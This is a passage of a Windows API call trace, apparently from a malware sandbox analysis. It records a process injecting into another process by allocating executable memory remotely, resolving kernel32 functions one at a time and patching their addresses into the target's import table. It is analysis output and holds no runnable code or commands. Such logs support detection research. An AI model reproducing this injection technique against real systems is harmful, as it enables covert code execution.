	[0187.889] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055240, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.889] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.889] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.889] lstrlenA (lpString="TlsSetValue") returned 11
	[0187.889] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.889] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7548*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7548*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.890] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.890] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.890] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.890] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.890] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.891] ResetEvent (hEvent=0x478) returned 1
	[0187.891] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.891] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.891] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.891] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.891] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.891] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055244, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.892] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.892] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.892] lstrlenA (lpString="TlsFree") returned 7
	[0187.892] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.892] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7556*, nSize=0x8, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7556*, lpNumberOfBytesWritten=0x12857c*=0x8) returned 1
	[0187.892] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.892] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.892] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.892] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.893] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.893] ResetEvent (hEvent=0x478) returned 1
	[0187.893] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.893] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.893] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.893] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.893] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.893] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055248, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.894] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.894] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.894] lstrlenA (lpString="LoadLibraryExW") returned 14
	[0187.894] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.894] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7560*, nSize=0xf, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7560*, lpNumberOfBytesWritten=0x12857c*=0xf) returned 1
	[0187.894] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.894] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.894] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.894] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.895] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.895] ResetEvent (hEvent=0x478) returned 1
	[0187.895] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.895] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.895] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.895] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.895] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.895] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005524c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.896] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.896] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.896] lstrlenA (lpString="GetModuleHandleExW") returned 18
	[0187.896] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.896] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7572*, nSize=0x13, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7572*, lpNumberOfBytesWritten=0x12857c*=0x13) returned 1
	[0187.896] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.896] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.897] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.897] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.897] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.897] ResetEvent (hEvent=0x478) returned 1
	[0187.897] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.898] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.898] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.898] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.898] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.898] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055250, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.898] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.898] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.898] lstrlenA (lpString="GetModuleFileNameA") returned 18
	[0187.898] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.899] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb7588*, nSize=0x13, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb7588*, lpNumberOfBytesWritten=0x12857c*=0x13) returned 1
	[0187.899] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.899] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.899] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.899] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.899] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.900] ResetEvent (hEvent=0x478) returned 1
	[0187.900] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.900] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.900] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.900] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.900] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.900] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055254, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.901] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.901] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.901] lstrlenA (lpString="MultiByteToWideChar") returned 19
	[0187.901] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.901] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb759e*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb759e*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0187.901] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.901] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.901] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.901] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.902] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.902] ResetEvent (hEvent=0x478) returned 1
	[0187.902] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.902] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.902] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.902] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.902] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.903] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055258, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.903] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.903] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.903] lstrlenA (lpString="WideCharToMultiByte") returned 19
	[0187.903] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.903] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb75b4*, nSize=0x14, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb75b4*, lpNumberOfBytesWritten=0x12857c*=0x14) returned 1
	[0187.903] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.904] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.904] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.904] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.904] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.904] ResetEvent (hEvent=0x478) returned 1
	[0187.904] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.904] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.905] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.905] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.905] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.905] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x1005525c, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.905] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.905] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.905] lstrlenA (lpString="GetStdHandle") returned 12
	[0187.905] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.906] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb75ca*, nSize=0xd, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb75ca*, lpNumberOfBytesWritten=0x12857c*=0xd) returned 1
	[0187.906] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.906] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.906] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.906] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.906] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.907] ResetEvent (hEvent=0x478) returned 1
	[0187.907] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.907] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.907] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.907] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.907] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.907] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055260, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.907] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.908] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.908] lstrlenA (lpString="GetFileType") returned 11
	[0187.908] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.908] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb75da*, nSize=0xc, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb75da*, lpNumberOfBytesWritten=0x12857c*=0xc) returned 1
	[0187.908] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.908] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.908] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.908] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.909] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.909] ResetEvent (hEvent=0x478) returned 1
	[0187.909] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.909] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.909] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.909] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.909] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.909] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055264, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.910] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.910] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.910] lstrlenA (lpString="WriteConsoleW") returned 13
	[0187.910] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.910] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb75e8*, nSize=0xe, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb75e8*, lpNumberOfBytesWritten=0x12857c*=0xe) returned 1
	[0187.910] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.910] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.910] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0187.910] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ad108*, nSize=0x10, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x22ad108*, lpNumberOfBytesWritten=0x1284f4*=0x10) returned 1
	[0187.911] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c*, nSize=0x70, lpNumberOfBytesWritten=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesWritten=0x1284f4*=0x70) returned 1
	[0187.911] ResetEvent (hEvent=0x478) returned 1
	[0187.911] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0187.911] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284f4 | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284f4*=0x70) returned 1
	[0187.911] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.911] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad108) returned 1
	[0187.911] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0187.911] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10055268, lpBuffer=0x12879c*, nSize=0x4, lpNumberOfBytesWritten=0x1286e4 | out: lpBuffer=0x12879c*, lpNumberOfBytesWritten=0x1286e4*=0x4) returned 1
	[0187.912] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0187.912] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0187.912] lstrlenA (lpString="GetACP") returned 6
	[0187.912] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0187.912] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0xeb75f8*, nSize=0x7, lpNumberOfBytesWritten=0x12857c | out: lpBuffer=0xeb75f8*, lpNumberOfBytesWritten=0x12857c*=0x7) returned 1
	[0187.912] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x12851c, nSize=0x70, lpNumberOfBytesRead=0x1284fc | out: lpBuffer=0x12851c*, lpNumberOfBytesRead=0x1284fc*=0x70) returned 1
	[0187.913] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad108
	[0187.913] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
